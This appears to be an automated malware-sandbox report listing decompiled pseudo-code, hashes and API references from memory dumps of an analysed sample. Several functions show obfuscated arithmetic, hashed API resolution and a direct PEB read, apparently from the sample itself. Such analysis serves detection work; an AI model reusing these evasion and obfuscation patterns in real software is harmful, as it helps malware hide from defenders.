Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 930ab9b767b3d9919173fcead0ec33390840cf0bfe667080b581cc8575a7d916
Instruction ID: 139ea33ab2e09bbbc94c401708a774e7386c3b0e021803cd191fceed244890e3
Opcode Fuzzy Hash: 930ab9b767b3d9919173fcead0ec33390840cf0bfe667080b581cc8575a7d916
Instruction Fuzzy Hash: 3641B772F001294BAF08CE59CCD25FFB7EAEBD8311B15802AE855E7341D578AE0687E4

Uniqueness

Uniqueness Score: -1.00%

Function 00449A60, Relevance: .1, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00449A60(void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _t41;
				signed char _t42;
				signed int _t43;
				signed char _t45;
				signed int _t50;
				signed int _t54;
				signed int _t55;
				signed char _t59;
				signed int _t61;
				signed char _t66;
				signed int _t67;
				signed int _t68;
				signed char _t71;
				signed int _t78;
				signed char _t83;
				signed char _t85;
				signed int _t86;
				signed int _t94;
				signed int _t105;
				signed int _t116;

				_t105 = _a4;
				_t59 = (_t105 ^ 0x000000f5) - _t105;
				_t41 = E00447DD0(0xa4) & _t59;
				_t78 = _t41 * _t59 >> 0x20;
				_t42 = _t41 * _t59;
				_t68 = _t42;
				_t61 = _t42 & _t105;
				_t43 = _a8;
				asm("sbb eax, [ebp+0x14]");
				if(_t105 < _a12) {
					_t55 = _t68 + _t61;
					_t78 = _t55 * _t78 >> 0x20;
					_t68 = _t55 * _t78;
					_t43 = _t68;
					_v20 = _t43;
					_t61 = 0;
				}
				if((_t68 >> 0x0000001f ^ _a8 | _t68 ^ _t78) == 0) {
					_t94 = _a12;
				} else {
					_t94 = _a12;
					if((_t68 >> 0x0000001f ^ _a16 | _t68 ^ _t94) != 0) {
						_t54 = _v20;
						_t67 = _t61 & _t54 * _t94;
						_t43 = _t54 + _t67 + 0xe;
						_t68 = _t67;
					}
				}
				_v24 = 0;
				if((_a8 ^ _a16 | _a4 ^ _t94) != 0) {
					_v24 = 0x1cb;
				}
				_t83 = _t43 ^ _v20;
				_t45 = _t68 & _t83;
				_t66 = _t45 + 0xfffffefa;
				if((_t83 >> 0x0000001f ^ _a8 | _t83 ^ _a4) != 0 || (_t66 >> 0x0000001f ^ _a8 | _t66 ^ _a4) != 0) {
					_t71 = (_t68 ^ _t68 ^ _t66) + _t83;
					_t83 = _t71;
					_t68 = _t45 + (_t71 + _t66 & _t45) + (_t71 + _t66 & _t45);
				}
				_v20 = _t83;
				_t116 = _t83;
				if((_a16 ^ _t116 >> 0x0000001f | _a12 ^ _t116) == 0) {
					L14:
					_t50 = (_t68 ^ _v20) - _t66;
					_t85 = _v24;
					_t86 = _t50 * _t85 >> 0x20;
					_t68 = _t50 * _t85;
					goto L15;
				} else {
					asm("sbb eax, edi");
					if(_t116 >= _a4) {
						goto L14;
					}
					_t86 = _v24;
					L15:
					 *0x462098 = _t68;
					return _t86;
				}
			}

0x00449a6c
0x00449a77
0x00449a88
0x00449a8a
0x00449a8a
0x00449a8c
0x00449a91
0x00449a96
0x00449a98
0x00449a9b
0x00449a9f
0x00449aa1
0x00449aa3
0x00449aa5
0x00449aa8
0x00449aab
0x00449aab
0x00449ac0
0x00449aeb
0x00449ac2
0x00449aca
0x00449ad4
0x00449ad6
0x00449ade
0x00449ae3
0x00449ae7
0x00449ae7
0x00449ad4
0x00449afb
0x00449b04
0x00449b06
0x00449b06
0x00449b0f
0x00449b14
0x00449b19
0x00449b2f
0x00449b46
0x00449b48
0x00449b52
0x00449b52
0x00449b57
0x00449b5a
0x00449b70
0x00449b7e
0x00449b83
0x00449b85
0x00449b88
0x00449b8a
0x00000000
0x00449b72
0x00449b75
0x00449b77
0x00000000
0x00000000
0x00449b79
0x00449b8c
0x00449b8f
0x00449b9d
0x00449b9d

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f63d6f10345615a1dfbf61c467d6165b1be72dc67d34e79dfa03a82567f5eddf
Instruction ID: ad6d598de9167376a10d0a7bdbbd21356f33053ac34379f40ca66e619e8ef546
Opcode Fuzzy Hash: f63d6f10345615a1dfbf61c467d6165b1be72dc67d34e79dfa03a82567f5eddf
Instruction Fuzzy Hash: 09417333A405254BAF10CE6998910EFB3E6EFD8320B2A8526DC54BB344D674BD0697D4

Uniqueness

Uniqueness Score: -1.00%

Function 00458830, Relevance: .1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00458830(void* __ecx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t26;
				intOrPtr* _t28;
				void* _t34;
				void* _t42;
				signed short _t45;
				signed int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t57;
				intOrPtr* _t61;
				intOrPtr* _t62;
				void* _t63;
				signed short _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t73;
				intOrPtr* _t79;
				intOrPtr _t81;

				_t26 = E004500D0(_a8);
				_t68 = _t67 + 4;
				_t76 = _t26;
				_v32 = _t26;
				if(_t26 == 0) {
					L6:
					return 0;
				}
				_t48 = _a4;
				_t28 = E00459180(_t76, _a4);
				_t69 = _t68 + 4;
				_t61 = _t28;
				if(_t61 != 0) {
					if( *_t61 == 0) {
						goto L6;
					}
					_t62 = _t61 + 0x14;
					_t79 = _t62;
					while(1) {
						_t34 = E0044ACF0(E00441460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2, _t79, _a8, E00441460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2);
						_t69 = _t69 + 0x10;
						if(_t34 == 0) {
							break;
						}
						_t81 =  *_t62;
						_t62 = _t62 + 0x14;
						if(_t81 != 0) {
							continue;
						}
						goto L6;
					}
					_t51 =  ~(E00441460(__eflags, E004422E0(__eflags, 0,  *((intOrPtr*)(_t62 - 0x14))),  ~_t48));
					E00441460(__eflags,  *((intOrPtr*)(_t62 - 0x14)), _a4);
					_t73 = _t69 + 0x18;
					_t66 =  *_t51;
					_v28 = _t51;
					__eflags = _t66;
					if(_t66 == 0) {
						L12:
						return 1;
					}
					_t54 = _a4;
					_t63 = 0;
					_t55 = _t54 + 0xd8be785;
					__eflags = _t55;
					_v24 = _t55;
					_v20 =  *((intOrPtr*)(_t62 - 4)) + _t54;
					while(1) {
						E00443750(__eflags, _t66, 0xffff);
						_t42 = E00449D50(0x960018d7);
						__eflags = _t66;
						_t57 = _v24 + _t66;
						_t44 =  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2;
						_t45 = E00456B30(_t66, _v32,  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2);
						_t73 = _t73 + 0x14;
						__eflags = _t45;
						_t55 = (_t57 & 0xffffff00 | _t45 != 0x00000000) & _t55;
						__eflags = _t45;
						 *(_v20 + _t63) = _t45;
						if(_t45 == 0) {
							break;
						}
						_t66 =  *(_v28 + _t63 + 4);
						_t63 = _t63 + 4;
						__eflags = _t66;
						if(__eflags != 0) {
							continue;
						}
						goto L12;
					}
					return _t55;
				}
				return 1;
			}

0x0045883c
0x00458841
0x00458844
0x00458846
0x00458849
0x0045889c
0x00000000
0x0045889c
0x0045884b
0x0045884f
0x00458854
0x00458857
0x0045885d
0x00458862
0x00000000
0x00000000
0x00458864
0x00458864
0x00458870
0x00458888
0x0045888d
0x00458892
0x00000000
0x00000000
0x00458894
0x00458897
0x0045889a
0x00000000
0x00000000
0x00000000
0x0045889a
0x004588c2
0x004588c8
0x004588cd
0x004588d0
0x004588d2
0x004588d5
0x004588d7
0x0045894a
0x00000000
0x0045894a
0x004588dc
0x004588df
0x004588e3
0x004588e3
0x004588e9
0x004588ec
0x004588f0
0x004588f8
0x00458905
0x00458910
0x00458915
0x0045891c
0x00458923
0x00458928
0x0045892e
0x00458933
0x00458935
0x00458937
0x0045893a
0x00000000
0x00000000
0x0045893f
0x00458943
0x00458946
0x00458948
0x00000000
0x00000000
0x00000000
0x00458948
0x00000000
0x00458951
0x004588a5

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d56140c696fb06c434bb8954bb3fc7c383ecb2ca708e747274fb9fee3d7b59
Instruction ID: d478c59b362b067565e30c9b0b337851efb3077c96c350c5b53860754ad62248
Opcode Fuzzy Hash: c3d56140c696fb06c434bb8954bb3fc7c383ecb2ca708e747274fb9fee3d7b59
Instruction Fuzzy Hash: FB31DBB6D001165BEB10AE55DC42A7B7764EF40319F450029ED08B7343EF39DD14C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00449C60, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00449C60(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _t35;
				signed int _t36;
				signed int _t38;
				signed int _t42;
				signed int _t44;
				signed char _t45;
				signed int _t49;
				signed char _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				signed int _t60;
				signed int _t75;
				signed int _t76;
				signed int _t88;
				signed int _t94;
				signed int _t95;

				_t95 = _a12;
				_t35 = _a4 * 0xffffffa5 * _t95;
				_t53 = _t35 - _t95;
				_t49 = 0;
				if((_t35 >> 0x0000001f ^ _a16 | _t35 ^ _t95) != 0) {
					_t36 = _a4;
					_t75 =  !_t95 & (_t53 | _t35) + _t36;
					_t38 = _t75 * 0x73;
					_t53 = _t75;
					_t76 = _t36;
				} else {
					_t38 = 0;
					_t76 = _a4;
				}
				asm("sbb edx, [ebp+0xc]");
				if(_t95 >= _t76) {
					_t49 = 0x3a1;
				}
				_t56 = _t53;
				_t94 = (_t38 & _t95 ^ _t49) * _t56 * 0x77;
				_t57 = _t56 ^ _t94;
				_t42 = _t49;
				_v24 = _t57;
				_v32 = _t42;
				_t51 = _t57 * _t42;
				_t44 = E00447DD0(0xc5) * _t51;
				_v17 = _t44;
				_v28 = _t94;
				_t45 = _t44 * _t94;
				_t60 = _a8;
				asm("sbb edx, ecx");
				if(_t51 >= _a4) {
					L8:
					_t88 = (_v24 + _t45 * _a4 - _t45 * _a4 ^ _v28) + _t45 * _a4 ^ _v17;
				} else {
					_t88 = _t60 ^ _a16 | _t95 ^ _a4;
					if(_t88 == 0 || (_t51 >> 0x0000001f ^ _a16 | _t95 ^ _t51) != 0) {
						goto L8;
					}
				}
				 *0x462100 = _t88;
				return _v32;
			}

0x00449c69
0x00449c73
0x00449c7c
0x00449c85
0x00449c89
0x00449c94
0x00449c9f
0x00449ca4
0x00449ca7
0x00449ca9
0x00449c8b
0x00449c8b
0x00449c8d
0x00449c8d
0x00449cb0
0x00449cb3
0x00449cb5
0x00449cb5
0x00449cbe
0x00449cc4
0x00449cc7
0x00449cc9
0x00449ccb
0x00449cd0
0x00449cd3
0x00449ce3
0x00449ce5
0x00449cea
0x00449ced
0x00449cfa
0x00449cfd
0x00449cff
0x00449d1e
0x00449d38
0x00449d01
0x00449d0b
0x00449d0d
0x00000000
0x00000000
0x00449d0d
0x00449d3a
0x00449d4a

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86a3766c7b60a4de968b28f4f856da42b624372a393c12747574206bc4b7bbe
Instruction ID: 7d4f9398332cb0f46f57eb6fa994b77a9852bda1d9dcb3c91a1f05e67ed124d4
Opcode Fuzzy Hash: b86a3766c7b60a4de968b28f4f856da42b624372a393c12747574206bc4b7bbe
Instruction Fuzzy Hash: 1E31B171B000195BAB0CCE6DD8D25BFBBEAABC4201B14C12FE809DB298D9749D068784

Uniqueness

Uniqueness Score: -1.00%

Function 00520865, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2169165988.0000000000520000.00000040.00020000.sdmp, Offset: 00520000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 335b913c18bb5e1d721b68229044a58fc69fc49c73932eb05ca60895b1217654
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: DD1172733412109FD714DE55EC81EA3B79AFF993307298165ED04CB396D675E84287A0

Uniqueness

Uniqueness Score: -1.00%

Function 00520C5E, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2169165988.0000000000520000.00000040.00020000.sdmp, Offset: 00520000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 95a5371ccb3ee233f0e76c17c137b138b9fc9e2b06cf1b0783b96e7dcd409e7a
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 0301C0B33162208FC718CF29E884D69FBA8EFC2320B19917AC54697697D120AC45C520

Uniqueness

Uniqueness Score: -1.00%

Function 0045CE40, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045CE40(short* _a4, intOrPtr _a8) {
				void* _t8;
				short* _t9;
				intOrPtr _t10;
				short* _t11;
				void* _t12;

				_t10 = _a8;
				_t11 = _a4;
				if(_t10 != 0) {
					_t11 = _t11 + 2;
					_t9 = 0;
					while( *((short*)(_t11 - 2)) != 0) {
						L3:
						_t11 = _t11 + 2;
					}
					if( *_t11 == 0) {
						_t11 = 0;
					} else {
						_t8 = E00449D50(0x1e99166a);
						_t12 = _t12 + 4;
						_t9 = _t9 + _t8 - 0x7aed16c5;
						if(_t9 != _t10) {
							goto L3;
						} else {
						}
					}
				}
				return _t11;
			}

0x0045ce46
0x0045ce49
0x0045ce4e
0x0045ce50
0x0045ce53
0x0045ce5a
0x0045ce60
0x0045ce60
0x0045ce63
0x0045ce6e
0x0045ce8a
0x0045ce70
0x0045ce75
0x0045ce7a
0x0045ce7d
0x0045ce86
0x00000000
0x00000000
0x0045ce88
0x0045ce86
0x0045ce6e
0x0045ce92

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8db077be36dd7dd0c03fe44961d1943ba693b2158ba0f316bbeb6675301aaf28
Instruction ID: 008338fa3f9a88f077dc1649e6edb2fe98726a66ea8c1b93a464be06100845b5
Opcode Fuzzy Hash: 8db077be36dd7dd0c03fe44961d1943ba693b2158ba0f316bbeb6675301aaf28
Instruction Fuzzy Hash: 98F0A762E403289AE7315E54E8C7867F3B5EB51765F19802BDC0963342A2B55CCCC6D9

Uniqueness

Uniqueness Score: -1.00%

Function 00452EF0, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00452EF0() {

				return  *[fs:0x30];
			}

0x00452ef6

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 005086D9, Relevance: 19.6, APIs: 13, Instructions: 109memorythreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0051CB9C,?,00506F6A), ref: 005086DF
__mtterm.LIBCMT ref: 005086EB

Part of subcall function 005083C3: __decode_pointer.LIBCMT ref: 005083D4
Part of subcall function 005083C3: TlsFree.KERNEL32(0051F0B8,00507006), ref: 005083EE

TlsAlloc.KERNEL32 ref: 00508778
__init_pointers.LIBCMT ref: 0050879D
__encode_pointer.LIBCMT ref: 005087A8
__encode_pointer.LIBCMT ref: 005087B8
__encode_pointer.LIBCMT ref: 005087C8
__encode_pointer.LIBCMT ref: 005087D8
__decode_pointer.LIBCMT ref: 005087F9
__calloc_crt.LIBCMT ref: 00508812
__decode_pointer.LIBCMT ref: 0050882C
GetCurrentThreadId.KERNEL32 ref: 00508842

Memory Dump Source

Source File: 00000004.00000002.2169048342.0000000000466000.00000020.00020000.sdmp, Offset: 00466000, based on PE: false

Similarity

API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__mtterm
String ID:
API String ID: 802150526-0
Opcode ID: cc26695c09e1dfc7298ee6125966c458e7e066e7a29787b8d46d2efa5e3656c1
Instruction ID: 85140bcf4ca4eafdd803c1ee287fc05a066504663597e6e4bce2ba1e333b5e5a
Opcode Fuzzy Hash: cc26695c09e1dfc7298ee6125966c458e7e066e7a29787b8d46d2efa5e3656c1
Instruction Fuzzy Hash: 323193765022029ACB10AF75BC09F7E3FA0FBA47507518D2AF490D23E1DF75A588AF50

Uniqueness

Uniqueness Score: -1.00%

Function 0050885D, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0050887B

Part of subcall function 0050B081: __mtinitlocknum.LIBCMT ref: 0050B095
Part of subcall function 0050B081: __amsg_exit.LIBCMT ref: 0050B0A1
Part of subcall function 0050B081: RtlEnterCriticalSection.NTDLL(?), ref: 0050B0A9

___sbh_find_block.LIBCMT ref: 00508886
___sbh_free_block.LIBCMT ref: 00508895
HeapFree.KERNEL32(00000000,?,0051DDA8), ref: 005088C5
GetLastError.KERNEL32(?,005088F8,?,00000001,?,0050B00B,00000018,0051DE68,0000000C,0050B09A,?,?,?,005085D2,0000000D,0051DD80), ref: 005088D6

Memory Dump Source

Source File: 00000004.00000002.2169048342.0000000000466000.00000020.00020000.sdmp, Offset: 00466000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: b0da396ac3b044d4d6fd3ea6d129ee8e09e1e6b41597fb2f1d6261be39f6e491
Instruction ID: 737f42b443a8d0411508454a175eb97cc5a942dbf459fbbc071fb498a334cb7f
Opcode Fuzzy Hash: b0da396ac3b044d4d6fd3ea6d129ee8e09e1e6b41597fb2f1d6261be39f6e491
Instruction Fuzzy Hash: BC01D631900302EAEB207FB0AC4EFAE3E64BF90320F648819F594A61D1DF7589859B55

Uniqueness

Uniqueness Score: -1.00%

Function 00442340, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00442340(char _a4) {
				signed int _v20;
				struct HDC__* _v24;
				signed int _v28;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				struct HWND__* _t32;
				int _t34;
				struct HWND__* _t35;
				signed int _t36;
				signed int _t39;
				int _t42;
				signed int _t48;
				signed int _t49;
				signed int _t54;
				void* _t56;
				signed int _t58;
				int _t59;

				_t1 =  &_a4; // 0x442f73
				_t56 =  *_t1;
				_t34 = _t56 & 0x00000100;
				RegEnumValueW(_t56, _t34, _t34, _t56 & 0xfffffeff, _t34, _t56 & 0xfffffeff, _t56, _t34);
				_t35 = _t34 * _t56;
				_t39 = 0;
				if(_t35 != _t56) {
					_t36 = _t35 | _t56;
					_t32 = _t36 * _t56;
					_t39 = _t36 * _t32 | _t32;
					_t35 = _t32;
				}
				_t54 = _t39 ^ _t56;
				DestroyWindow(_t35);
				_t58 = _t39 * _t54;
				_v20 = _t58;
				_t3 =  &_a4; // 0x442f73
				_t59 =  *_t3;
				_t42 = _t58 - _t59;
				if(_t59 == 0xaec9ea02 && _t35 != 0xaec9ea02) {
					_t48 = _t42 * _t35;
					_t5 = _t54 - 0x513615fe; // -1362499070
					_t49 = _t48 + _t5;
					_t42 = _t48 + 0xaec9ea02;
					_v24 = _t49;
					_t28 = _t54 * _t49;
					_v28 = _t28;
					_t29 = _t28 + 0xc9;
					_t30 = _t29 * _t35;
					_t35 = _t29 * _t35 >> 0x20;
					_v20 = _t30;
				}
				if(_t35 >= _t59 && _t42 != _t59) {
					MoveToEx(_v24, _t59, _t42, _t59);
					return ((_v28 ^ (_t35 + _v20 & 0x000000ff) * 0xffffffe3) << 0x18) + 0x2a000000 >> 0x18;
				}
				return 0;
			}

0x00442349
0x00442349
0x0044234e
0x00442363
0x00442369
0x0044236c
0x00442370
0x00442372
0x00442376
0x0044237e
0x00442381
0x00442381
0x00442385
0x0044238a
0x00442390
0x00442393
0x00442398
0x00442398
0x0044239e
0x004423a6
0x004423b2
0x004423b5
0x004423b5
0x004423bc
0x004423c2
0x004423c5
0x004423c8
0x004423d0
0x004423d2
0x004423d4
0x004423d6
0x004423d6
0x004423e2
0x004423ee
0x00000000
0x00442410
0x00442419

APIs

RegEnumValueW.ADVAPI32(s/D,s/D,s/D,s/D,s/D,s/D,s/D,s/D,?,00442F73,?,?,?,?,?,0044AE51), ref: 00442363
DestroyWindow.USER32 ref: 0044238A
MoveToEx.GDI32(00000000,s/D,00000000,s/D), ref: 004423EE

Strings

s/D, xrefs: 00442349, 00442398, 0044235B, 0044235C, 0044235D, 0044235E, 0044235F, 00442360, 00442361, 00442362, 00442387, 004423E8, 004423EA

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyEnumMoveValueWindow
String ID: s/D
API String ID: 1329181790-3395007231
Opcode ID: a30fadfb94ff6d26eed294366514ca548af8c80c01782ecc0b76687a98cf47de
Instruction ID: 647044e1b91f3fbde56c8aa4a8f7696a297328a9a5c7aa152f332f130c79c6a7
Opcode Fuzzy Hash: a30fadfb94ff6d26eed294366514ca548af8c80c01782ecc0b76687a98cf47de
Instruction Fuzzy Hash: 2A2129717002355F9B1C8AA98DD66BFBEEDEB88661B05013BF406DB291E5E44D4182E4

Uniqueness

Uniqueness Score: -1.00%

Function 004446E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004446E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x004446e7
0x004446ea
0x004446ed
0x004446f4
0x004446fa
0x004446ff
0x00444709
0x00444711
0x00444713
0x00444715
0x00444718
0x00444720
0x00444725
0x00444781
0x00444784
0x00444786
0x00444791
0x0044479a
0x0044479f
0x004447a1
0x004447a3
0x004447ab
0x00000000
0x00000000
0x0044472c
0x00444731
0x0044473a
0x004447ad
0x004447ad
0x004447b6
0x004447ca
0x004447ca
0x004447cd
0x004447d1
0x004447e2
0x004447e7
0x004447f9
0x004447fc
0x004447fe
0x00444800
0x00444806
0x00444808
0x0044480a
0x00444810
0x0044481d
0x00444838
0x00444838
0x00444810
0x00444844
0x00444844
0x004447b8
0x004447be
0x00000000
0x004447c5
0x004447c5
0x00000000
0x004447c5
0x004447be
0x0044473c
0x00444743
0x00444745
0x0044474d
0x00444845
0x00444753
0x0044475d
0x00444760
0x0044476d
0x00444773
0x0044477c
0x0044477c
0x0044474d
0x00444743

APIs

OffsetRect.USER32 ref: 004446FF
LookupPrivilegeValueW.ADVAPI32(00000000,-00461D33,?), ref: 00444791
EndDialog.USER32 ref: 004447D1
SetTextColor.GDI32(-02981D33,-041C1D33), ref: 0044481D

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: b361f35e6b6eb37088e59fd48c078ee84ea71c0bf72d5a645948de957ca2adb8
Instruction ID: 4b2337615065674349d1ceab19e838157aa92ac5a4394bfdadfbd26a8457d052
Opcode Fuzzy Hash: b361f35e6b6eb37088e59fd48c078ee84ea71c0bf72d5a645948de957ca2adb8
